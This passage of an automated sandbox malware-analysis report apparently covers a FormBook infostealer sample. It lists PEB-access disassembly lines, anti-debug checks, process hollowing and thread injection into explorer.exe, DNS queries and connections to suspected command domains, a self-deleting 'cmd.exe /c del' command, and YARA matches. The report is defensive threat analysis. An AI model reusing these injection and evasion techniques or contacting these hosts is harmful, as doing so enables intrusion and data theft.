          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]13_2_047EFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]13_2_047EFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov ecx, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]13_2_04751DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]13_2_04751DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]13_2_04751DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F05AC mov eax, dword ptr fs:[00000030h]13_2_047F05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F05AC mov eax, dword ptr fs:[00000030h]13_2_047F05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047535A1 mov eax, dword ptr fs:[00000030h]13_2_047535A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475FD9B mov eax, dword ptr fs:[00000030h]13_2_0475FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475FD9B mov eax, dword ptr fs:[00000030h]13_2_0475FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473766D mov eax, dword ptr fs:[00000030h]13_2_0473766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAE44 mov eax, dword ptr fs:[00000030h]13_2_047EAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAE44 mov eax, dword ptr fs:[00000030h]13_2_047EAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DFE3F mov eax, dword ptr fs:[00000030h]13_2_047DFE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472E620 mov eax, dword ptr fs:[00000030h]13_2_0472E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A61C mov eax, dword ptr fs:[00000030h]13_2_0475A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A61C mov eax, dword ptr fs:[00000030h]13_2_0475A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]13_2_0472C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]13_2_0472C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]13_2_0472C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04758E00 mov eax, dword ptr fs:[00000030h]13_2_04758E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1608 mov eax, dword ptr fs:[00000030h]13_2_047E1608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047376E2 mov eax, dword ptr fs:[00000030h]13_2_047376E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047516E0 mov ecx, dword ptr fs:[00000030h]13_2_047516E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8ED6 mov eax, dword ptr fs:[00000030h]13_2_047F8ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04768EC7 mov eax, dword ptr fs:[00000030h]13_2_04768EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047536CC mov eax, dword ptr fs:[00000030h]13_2_047536CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DFEC0 mov eax, dword ptr fs:[00000030h]13_2_047DFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]13_2_047F0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]13_2_047F0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]13_2_047F0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A46A7 mov eax, dword ptr fs:[00000030h]13_2_047A46A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFE87 mov eax, dword ptr fs:[00000030h]13_2_047BFE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473FF60 mov eax, dword ptr fs:[00000030h]13_2_0473FF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8F6A mov eax, dword ptr fs:[00000030h]13_2_047F8F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473EF40 mov eax, dword ptr fs:[00000030h]13_2_0473EF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475E730 mov eax, dword ptr fs:[00000030h]13_2_0475E730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04724F2E mov eax, dword ptr fs:[00000030h]13_2_04724F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04724F2E mov eax, dword ptr fs:[00000030h]13_2_04724F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474F716 mov eax, dword ptr fs:[00000030h]13_2_0474F716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFF10 mov eax, dword ptr fs:[00000030h]13_2_047BFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFF10 mov eax, dword ptr fs:[00000030h]13_2_047BFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F070D mov eax, dword ptr fs:[00000030h]13_2_047F070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F070D mov eax, dword ptr fs:[00000030h]13_2_047F070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A70E mov eax, dword ptr fs:[00000030h]13_2_0475A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A70E mov eax, dword ptr fs:[00000030h]13_2_0475A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047637F5 mov eax, dword ptr fs:[00000030h]13_2_047637F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04738794 mov eax, dword ptr fs:[00000030h]13_2_04738794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]13_2_047A7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]13_2_047A7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]13_2_047A7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F1074 mov eax, dword ptr fs:[00000030h]13_2_047F1074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E2073 mov eax, dword ptr fs:[00000030h]13_2_047E2073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04740050 mov eax, dword ptr fs:[00000030h]13_2_04740050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04740050 mov eax, dword ptr fs:[00000030h]13_2_04740050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]13_2_0473B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]13_2_0473B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]13_2_0473B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]13_2_0473B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F4015 mov eax, dword ptr fs:[00000030h]13_2_047F4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F4015 mov eax, dword ptr fs:[00000030h]13_2_047F4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]13_2_047A7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]13_2_047A7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]13_2_047A7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047258EC mov eax, dword ptr fs:[00000030h]13_2_047258EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov ecx, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov ecx, dword ptr fs:[00000030h]13_2_0475F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov eax, dword ptr fs:[00000030h]13_2_0475F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov eax, dword ptr fs:[00000030h]13_2_0475F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047690AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04729080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047A3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047A3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0474B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0474B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0475513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0475513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04744120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047B41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047A69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04752990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0475A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0474C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0476927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047DB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047DB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047EEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047B4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04764A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04764A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04725210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04743A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04738A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04752AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04752ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0473AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0473AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0475FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00409B40 LdrLoadDll
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.platinumcredit.net
Source: C:\Windows\explorer.exe | Domain query: www.thefullfledged.com
Source: C:\Windows\explorer.exe | Domain query: www.jakital.com
Source: C:\Windows\explorer.exe | Network Connect: 142.250.203.115 80
Source: C:\Windows\explorer.exe | Domain query: www.xcgtsret.com
Source: C:\Windows\explorer.exe | Domain query: www.suepersoldiers.com
Source: C:\Windows\explorer.exe | Domain query: www.arsels.info
Source: C:\Windows\explorer.exe | Domain query: www.electricatrick.com
Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.219 80
Source: C:\Windows\explorer.exe | Network Connect: 52.204.216.132 80
Source: C:\Windows\explorer.exe | Domain query: www.151motors.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 1B0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 3352
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Process created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.327891256.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.293464513.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.310106636.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.331243108.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.335912866.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.300895373.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.320269745.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
